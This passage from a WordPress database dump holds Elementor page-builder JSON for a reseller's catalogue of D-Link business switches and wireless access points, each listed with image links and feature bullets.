]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7628,3418,'_elementor_version','2.5.14'),(7629,3418,'_elementor_edit_mode','builder'),(7632,3419,'_wp_page_template','template-fullwidth.php'),(7633,3419,'_elementor_template_type','post'),(7634,3419,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green 